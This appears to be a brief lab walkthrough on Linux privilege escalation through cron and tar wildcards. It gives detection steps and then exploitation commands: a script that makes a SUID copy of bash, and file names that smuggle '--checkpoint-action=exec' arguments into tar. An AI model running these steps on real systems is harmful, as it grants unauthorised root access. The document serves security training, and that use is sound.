CRON - Wildcards
Detection
Linux VM
1. In command prompt type: cat /etc/crontab
2. From the output, notice the script β/usr/local/bin/compress.shβ
3. In command prompt type: cat /usr/local/bin/compress.sh
4. From the output, notice the wildcard (*) used by βtarβ.
Exploitation
Linux VM
1. In command prompt type:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
2. touch /home/user/--checkpoint=1
3. touch /home/user/--checkpoint-action=exec=sh\ runme.sh
4. Wait 1 minute for the Bash script to execute.
5. In command prompt type: /tmp/bash -p
6. In command prompt type: id
Last updated